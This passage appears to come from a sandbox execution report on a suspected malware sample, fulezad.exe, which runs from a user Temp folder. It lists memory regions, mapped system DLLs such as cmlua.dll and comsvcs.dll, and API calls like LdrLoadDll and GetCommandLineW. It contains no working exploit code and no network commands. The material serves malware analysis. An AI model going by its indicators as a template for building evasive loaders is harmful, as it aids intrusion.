end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1337 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1338 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1339 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1340 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1341 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1342 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1343 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1344 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1345 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1346 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1347 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1348 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1349 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1350 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1351 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1352 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1353 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1354 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1393 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1394 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1395 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1396 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1397 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1398 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1399 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1400 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1401 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1402 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1403 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1404 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1405 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1406 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1407 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1408 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1409 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1410 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1411 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1412 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1413 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1414 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1415 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1416 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1417 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1418 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1419 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1420 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1421 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1422 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1423 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1424 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1425 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1426 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1427 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1428 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1429 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1430 start_va = 0x1f60000 end_va = 0x236ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 1431 start_va = 0x2370000 end_va = 0x277ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 1432 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1433 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1434 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1435 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1436 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1437 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1442 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1443 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1444 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1445 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1446 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1447 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1448 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1449 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1450 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1451 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1452 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1453 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1454 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1455 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1456 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1457 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1458 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1459 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1460 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1461 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1462 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1463 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1464 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1465 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1466 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1467 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1468 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1469 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1470 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1471 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1472 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1473 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1474 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1475 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1476 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1477 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1478 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1479 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1480 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1481 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1482 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1483 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1484 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1485 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1486 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1487 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1488 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1489 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1490 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1491 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1492 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1493 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1494 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1495 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1496 start_va = 0x250000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1497 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1498 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1520 start_va = 0x75050000 end_va = 0x750cffff entry_point = 0x75050000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1521 start_va = 0x1f60000 end_va = 0x202ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1522 start_va = 0x2030000 end_va = 0x210efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002030000" filename = "" Region: id = 1523 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1524 start_va = 0x764b0000 end_va = 0x76532fff entry_point = 0x764b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1525 start_va = 0x75540000 end_va = 0x755cefff entry_point = 0x75540000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1590 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1729 start_va = 0x74df0000 end_va = 0x74f25fff entry_point = 0x74df0000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\SysWOW64\\comsvcs.dll" (normalized: "c:\\windows\\syswow64\\comsvcs.dll") Region: id = 1730 start_va = 0x75220000 end_va = 0x75233fff entry_point = 0x75220000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 1795 start_va = 0x74bb0000 end_va = 0x74bc5fff entry_point = 0x74bb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1804 start_va = 0x1f60000 end_va = 0x1f9bfff entry_point = 0x1f60000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1805 start_va = 0x1ff0000 end_va = 0x202ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 1806 start_va = 0x1f60000 end_va = 0x1f9bfff entry_point = 0x1f60000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1807 start_va = 0x1f60000 end_va = 0x1f9bfff entry_point = 0x1f60000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1808 start_va = 0x1f60000 end_va = 0x1f9bfff entry_point = 0x1f60000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1809 start_va = 0x1f60000 end_va = 0x1f9bfff entry_point = 0x1f60000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1810 start_va = 0x749c0000 end_va = 0x749fafff entry_point = 0x749c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1811 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1812 start_va = 0x1f60000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1813 start_va = 0x2110000 end_va = 0x220ffff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 1814 start_va = 0x749b0000 end_va = 0x749bdfff entry_point = 0x749b0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 1815 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2057 start_va = 0x1fa0000 end_va = 0x1fdffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 2058 start_va = 0x2210000 end_va = 0x230ffff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 2059 start_va = 0x2310000 end_va = 0x234ffff entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 2060 start_va = 0x2350000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 2061 start_va = 0x747c0000 end_va = 0x747cbfff entry_point = 0x747c0000 region_type = mapped_file name = "cmlua.dll" filename = "\\Windows\\SysWOW64\\cmlua.dll" (normalized: "c:\\windows\\syswow64\\cmlua.dll") Region: id = 2062 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2063 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2064 start_va = 0x74a00000 end_va = 0x74a0dfff entry_point = 0x74a00000 region_type = mapped_file name = "cmutil.dll" filename = "\\Windows\\SysWOW64\\cmutil.dll" (normalized: "c:\\windows\\syswow64\\cmutil.dll") Region: id = 2065 start_va = 0x74a20000 end_va = 0x74a28fff entry_point = 0x74a20000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Thread: id = 106 os_tid = 0x8b8 [0100.744] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x76540000) returned 0x0 [0100.760] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x75390000) returned 0x0 [0100.770] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x76160000) returned 0x0 [0101.606] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WTSAPI32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x752d0000) returned 0x0 [0101.686] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x76770000) returned 0x0 [0103.810] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.810] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x284f80*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.810] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.810] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x284ff8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.810] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.810] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285070*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.810] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2850e8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285160*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2851d8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285250*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2852c8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285340*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2853b8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285430*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2854a8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x285520*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.811] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.811] CommandLineToArgvW (in: 